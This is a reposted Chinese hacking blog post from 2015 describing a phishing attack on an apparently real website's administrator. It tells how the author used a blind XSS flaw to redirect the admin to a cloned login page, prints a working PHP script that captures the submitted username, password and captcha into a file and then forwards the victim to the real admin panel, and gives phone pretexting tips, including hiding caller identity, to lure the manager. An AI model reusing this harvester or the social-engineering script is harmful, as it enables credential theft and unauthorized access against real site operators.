记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

记一发钓鱼

2015-02-03 13:55

记一发钓鱼,首发于安全盒子

Author:L3m0n

Blog:http://www.iamstudy.tk

Team:安全盒子(www.secbox.cn)

网站存在xss漏洞,盲打几发过去.

图片1

由于各种因素.没能及时进到后台导致cookies失效.感觉挺被动的,于是想能不能来一发钓鱼,钓到管理员的账号密码。

利用Xss的js跳转到钓鱼页面目标网址oxxxx.com,可以考虑注册一个域名为0xxxx.com我没有抱着必拿之心,也就勉强的用自己的网站,目录弄成一样的,尽量的模仿,看看对面的谨慎度咯。

0x00钓鱼

保存好后台的源代码,把相对路径补齐,将action改成我们的接收脚本。

 图片2

接收post代:

<?php

//接收post过来的数值

$name = $_POST['id'];

$pass = $_POST['key'];

$code = $_POST['yanzhengma'];

//生成资源文件

$filename = "good.html";

@$handle = fopen($filename, "r");

@$contents = fread($handle,filesize($filename));

@fclose($handle);

$data = $name.'<--->'.$pass.'<--->'.$code.'<br>'.$contents;

file_put_contents($filename, $data);

echo '<script language="javascript">window.location.href = "http://www.test.com/admin/index.php";</script>';

?>

大致流程:接收管理员输入的账号密码post过来的数据,然后写入到同目录下的good.html里面。最后利用js跳转到真正网站的后台管理首页,由于他的cookies还未失效,可以直接进入。

 

为了加快时间,我决定来社工,在网站上找到联系方式。

 图片3

Ps:打座机电话比较好,对方没有来电显示。如果你要打手机的话,用网络虚拟电话打.但是这不保证对方有没有起疑心。

接下来

我就向经理抱怨:这是什么鬼,为啥我提交材料这么久却没有反应,他连忙道歉说:不好意思,您留个电话号码,我回拨联系您。

我说:长途电话耗钱,而且我也不太方便。

他说:那你就留过联系方式吧,QQ多少?

然后我就留下QQ。

大概的扯了一下

    图片4

图片5

转载记一发钓鱼请注明出自:安全盒子


知识来源: www.secbox.cn/hacker/1183.html

阅读:130031 | 评论:1 | 标签:黑客

想收藏或者和大家分享这篇好文章→复制链接地址

“记一发钓鱼”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云